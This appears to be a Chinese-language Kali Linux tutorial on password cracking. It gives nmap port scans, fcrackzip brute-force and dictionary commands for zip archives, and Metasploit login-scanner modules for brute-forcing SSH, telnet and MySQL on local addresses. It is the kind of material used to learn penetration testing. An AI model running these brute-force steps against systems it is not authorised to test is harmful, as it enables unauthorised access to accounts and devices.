作者: Kali笔记- priess
Kali下各种密码破解姿势总结
密码破解前期的准备
常见名词解释
常见端口信息收集
判断端口是否开启
利用 nmap即可查看目标端口是否开启
nmap -T4 -A 192.168.1.1/24扫描局域网内所有设备开启的相关端口,当然我们也可以中 msfconsole nessus等相关神器进行信息收集,但这里不再详讲!
如下图 这台 ASUS RT-N56U设备开启了 22 80等端口。
常见的破解方式
01压缩文件的暴力破解(zip rar )
使用fcrackzip破解zip压缩包
这是一款kali下字段的破解zip压缩包的工具。
使用如下:
破解ZIP加密文件
fcrackzip -b -l 6-6 -c 1 -p 000000 passwd.zip-b 暴力破解
-c 1 限制密码是数字
-l 6-6 限制密码长度为6
-p 000000 初始化破解起点
*
如何使用字典破解呢
fcrackzip -D -p passwd passwd.zip-D -p passwd 密码本passwd文件
当然,也可以参考我前面写过的一篇文章
《利用python破解zip密码》
02破解ssh
我们可以利用 nmap msfconsole 等工具里面字典的模块进行破解。这里 以 msfconsole为例:
use auxiliary/scanner/ssh/ssh_login
set PASS_FILE /root/zi.txt
set RHOSTS 192.168.123.1
set USERNAME admin
run
如下:密码和账号破解为 admin admin
( SSH)03telnet破解
Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。
它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。
扫描目标是否开启相应端口
nmap -T4 -A 192.168.123.1 -p 23结果如下:
23端口为远程登录端口
利用msfconsole中的相应模块进行破解
use auxiliary/scanner/telnet/telnet_login破解效果如下:
04 mysql破解
MySQL是一个关系型数据库管理系统,MySQL 是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQL是最好的 RDBMS 应用软件之一。
使用模块
use auxiliary/scanner/mysql/mysql_login
效果如下
数据库 dede 的密码为 123456
远程登录测试
当然,我们利用其他的密码破解工具也是可以的,如hashcat john medusa这些神器都可以完成密码的破解,每个工具都有各自的优势和缺点,这里我也不详细说明了。
